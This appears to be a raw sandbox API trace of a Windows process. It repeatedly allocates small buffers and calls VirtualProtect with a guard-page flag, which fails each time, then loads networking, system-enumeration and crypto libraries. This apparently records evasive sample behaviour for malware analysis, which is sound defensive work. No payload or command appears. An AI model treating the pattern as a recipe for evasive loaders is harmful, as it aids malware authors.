LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5768 [0206.365] VirtualProtect (in: lpAddress=0x6c5768, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.365] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c57b0 [0206.365] VirtualProtect (in: lpAddress=0x6c57b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.366] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5708 [0206.366] VirtualProtect (in: lpAddress=0x6c5708, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.367] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4980 [0206.367] VirtualProtect (in: lpAddress=0x6c4980, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.368] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c4920 [0206.368] VirtualProtect (in: lpAddress=0x6c4920, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.369] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c57e0 [0206.369] VirtualProtect (in: lpAddress=0x6c57e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.370] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6c5828 [0206.370] VirtualProtect (in: lpAddress=0x6c5828, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.370] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4700 [0206.370] VirtualProtect (in: lpAddress=0x6c4700, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.371] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6bab68 [0206.371] VirtualProtect (in: lpAddress=0x6bab68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.372] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c56a8 [0206.372] VirtualProtect (in: lpAddress=0x6c56a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.373] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c55d0 [0206.373] VirtualProtect (in: lpAddress=0x6c55d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.374] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6c49e0 [0206.374] VirtualProtect (in: lpAddress=0x6c49e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.375] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4860 [0206.376] VirtualProtect (in: lpAddress=0x6c4860, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.376] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x6c4a00 [0206.376] VirtualProtect (in: lpAddress=0x6c4a00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.377] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c57c8 [0206.377] VirtualProtect (in: lpAddress=0x6c57c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.378] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c46e0 [0206.378] VirtualProtect (in: lpAddress=0x6c46e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.379] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5600 [0206.379] VirtualProtect (in: lpAddress=0x6c5600, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.380] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c4be0 [0206.380] VirtualProtect (in: lpAddress=0x6c4be0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.390] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6c4ac0 [0206.390] VirtualProtect (in: lpAddress=0x6c4ac0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.391] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c5648 [0206.391] VirtualProtect (in: lpAddress=0x6c5648, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.392] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x6c4c40 [0206.392] VirtualProtect (in: lpAddress=0x6c4c40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.393] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x6c4e60 [0206.393] VirtualProtect (in: lpAddress=0x6c4e60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.393] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c57f8 [0206.394] VirtualProtect (in: lpAddress=0x6c57f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.395] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5810 [0206.395] VirtualProtect (in: lpAddress=0x6c5810, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.396] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c5840 [0206.396] VirtualProtect (in: lpAddress=0x6c5840, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.400] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4ae0 [0206.400] VirtualProtect (in: lpAddress=0x6c4ae0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.401] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4da0 [0206.401] VirtualProtect (in: lpAddress=0x6c4da0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.402] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4b00 [0206.402] VirtualProtect (in: lpAddress=0x6c4b00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.403] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5858 [0206.403] VirtualProtect (in: lpAddress=0x6c5858, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.404] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6c4b80 [0206.404] VirtualProtect (in: lpAddress=0x6c4b80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.404] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4bc0 [0206.405] VirtualProtect (in: lpAddress=0x6c4bc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.405] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c4b20 [0206.405] VirtualProtect (in: lpAddress=0x6c4b20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.406] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4cc0 [0206.406] VirtualProtect (in: lpAddress=0x6c4cc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.406] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6c4ca0 [0206.406] VirtualProtect (in: lpAddress=0x6c4ca0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.407] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5870 [0206.407] VirtualProtect (in: lpAddress=0x6c5870, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.407] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c5888 [0206.407] VirtualProtect (in: lpAddress=0x6c5888, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.417] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x6c4dc0 [0206.417] VirtualProtect (in: lpAddress=0x6c4dc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.418] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6c4b60 [0206.418] VirtualProtect (in: lpAddress=0x6c4b60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.419] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5660 [0206.419] VirtualProtect (in: lpAddress=0x6c5660, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.469] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6c0e88 [0206.469] VirtualProtect (in: lpAddress=0x6c0e88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.471] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4ce0 [0206.471] VirtualProtect (in: lpAddress=0x6c4ce0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.472] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4e00 [0206.472] VirtualProtect (in: lpAddress=0x6c4e00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.472] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c5678 [0206.473] VirtualProtect (in: lpAddress=0x6c5678, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.473] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c58a0 [0206.473] VirtualProtect (in: lpAddress=0x6c58a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.474] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c5780 [0206.474] VirtualProtect (in: lpAddress=0x6c5780, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.474] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c5690 [0206.475] VirtualProtect (in: lpAddress=0x6c5690, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.475] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4ba0 [0206.476] VirtualProtect (in: lpAddress=0x6c4ba0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.477] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c58b8 [0206.477] VirtualProtect (in: lpAddress=0x6c58b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.485] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4d60 [0206.485] VirtualProtect (in: lpAddress=0x6c4d60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.486] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c56c0 [0206.486] VirtualProtect (in: lpAddress=0x6c56c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.487] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c56d8 [0206.487] VirtualProtect (in: lpAddress=0x6c56d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.487] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c56f0 [0206.488] VirtualProtect (in: lpAddress=0x6c56f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.488] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c5720 [0206.488] VirtualProtect (in: lpAddress=0x6c5720, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.489] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c4c20 [0206.489] VirtualProtect (in: lpAddress=0x6c4c20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.490] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x6c4c80 [0206.490] VirtualProtect (in: lpAddress=0x6c4c80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.491] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c5738 [0206.495] VirtualProtect (in: lpAddress=0x6c5738, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.497] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0f18 [0206.497] VirtualProtect (in: lpAddress=0x6c0f18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.498] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c5750 [0206.498] VirtualProtect (in: lpAddress=0x6c5750, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.498] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c58d0 [0206.498] VirtualProtect (in: lpAddress=0x6c58d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.499] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c5918 [0206.499] VirtualProtect (in: lpAddress=0x6c5918, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.500] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c5a08 [0206.500] VirtualProtect (in: lpAddress=0x6c5a08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.501] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0e18 [0206.501] VirtualProtect (in: lpAddress=0x6c0e18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.501] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4de0 [0206.501] VirtualProtect (in: lpAddress=0x6c4de0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.502] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5a80 [0206.502] VirtualProtect (in: lpAddress=0x6c5a80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.503] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c58e8 [0206.503] VirtualProtect (in: lpAddress=0x6c58e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.504] LocalAlloc (uFlags=0x40, uBytes=0x22) returned 0x6bf810 [0206.504] VirtualProtect (in: lpAddress=0x6bf810, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.504] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4d40 [0206.504] VirtualProtect (in: lpAddress=0x6c4d40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.505] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c4c00 [0206.505] VirtualProtect (in: lpAddress=0x6c4c00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.506] LocalAlloc (uFlags=0x40, uBytes=0x1d) returned 0x6ba7f8 [0206.506] VirtualProtect (in: lpAddress=0x6ba7f8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.507] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4d00 [0206.507] VirtualProtect (in: lpAddress=0x6c4d00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.507] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x6ba820 [0206.507] VirtualProtect (in: lpAddress=0x6ba820, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.508] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6c4d20 [0206.508] VirtualProtect (in: lpAddress=0x6c4d20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.509] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6c5f10 [0206.509] VirtualProtect (in: lpAddress=0x6c5f10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.511] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c59c0 [0206.511] VirtualProtect (in: lpAddress=0x6c59c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.511] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5900 [0206.511] VirtualProtect (in: lpAddress=0x6c5900, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.512] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6c5a68 [0206.512] VirtualProtect (in: lpAddress=0x6c5a68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.513] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6c4e20 [0206.513] VirtualProtect (in: lpAddress=0x6c4e20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.514] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4d80 [0206.514] VirtualProtect (in: lpAddress=0x6c4d80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.514] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4c60 [0206.514] VirtualProtect (in: lpAddress=0x6c4c60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.515] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c59a8 [0206.515] VirtualProtect (in: lpAddress=0x6c59a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.553] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5930 [0206.553] VirtualProtect (in: lpAddress=0x6c5930, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.555] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6c0e28 [0206.555] VirtualProtect (in: lpAddress=0x6c0e28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.556] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5948 [0206.556] VirtualProtect (in: lpAddress=0x6c5948, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.557] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c4e40 [0206.557] VirtualProtect (in: lpAddress=0x6c4e40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.558] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6c5960 [0206.558] VirtualProtect (in: lpAddress=0x6c5960, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.559] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x6c5c18 [0206.559] VirtualProtect (in: lpAddress=0x6c5c18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.559] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4b40 [0206.559] VirtualProtect (in: lpAddress=0x6c4b40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.561] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x6c5b00 [0206.562] VirtualProtect (in: lpAddress=0x6c5b00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.574] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5a20 [0206.575] VirtualProtect (in: lpAddress=0x6c5a20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.576] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6c5a38 [0206.576] VirtualProtect (in: lpAddress=0x6c5a38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.577] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x6c6420 [0206.577] VirtualProtect (in: lpAddress=0x6c6420, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.578] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c63a0 [0206.578] VirtualProtect (in: lpAddress=0x6c63a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.578] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5978 [0206.578] VirtualProtect (in: lpAddress=0x6c5978, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.579] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x6c6660 [0206.579] VirtualProtect (in: lpAddress=0x6c6660, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.580] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c65c0 [0206.580] VirtualProtect (in: lpAddress=0x6c65c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.581] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c5a50 [0206.581] VirtualProtect (in: lpAddress=0x6c5a50, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.581] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6c0f38 [0206.581] VirtualProtect (in: lpAddress=0x6c0f38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.582] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c5990 [0206.582] VirtualProtect (in: lpAddress=0x6c5990, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.582] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x6c0e98 [0206.583] VirtualProtect (in: lpAddress=0x6c0e98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.583] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6c0f98 [0206.583] VirtualProtect (in: lpAddress=0x6c0f98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.585] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6c0ee8 [0206.585] VirtualProtect (in: lpAddress=0x6c0ee8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.588] LocalAlloc (uFlags=0x40, uBytes=0x31) returned 0x6bdb18 [0206.593] VirtualProtect (in: lpAddress=0x6bdb18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.594] LocalAlloc (uFlags=0x40, uBytes=0x27) returned 0x6bdb58 [0206.594] VirtualProtect (in: lpAddress=0x6bdb58, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.595] LocalAlloc (uFlags=0x40, uBytes=0x38) returned 0x6b6838 [0206.595] VirtualProtect (in: lpAddress=0x6b6838, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.596] LocalAlloc (uFlags=0x40, uBytes=0x27) returned 0x6b6878 [0206.596] VirtualProtect (in: lpAddress=0x6b6878, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.597] LocalAlloc (uFlags=0x40, uBytes=0x22) returned 0x6c1990 [0206.597] VirtualProtect (in: lpAddress=0x6c1990, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.598] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6c0f28 [0206.598] VirtualProtect (in: lpAddress=0x6c0f28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.602] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77720000 [0206.602] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x6e0b0000 [0211.432] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77450000 [0211.432] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x76b30000 [0211.432] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x74ed0000 [0211.689] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x74990000 [0211.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x740f0000 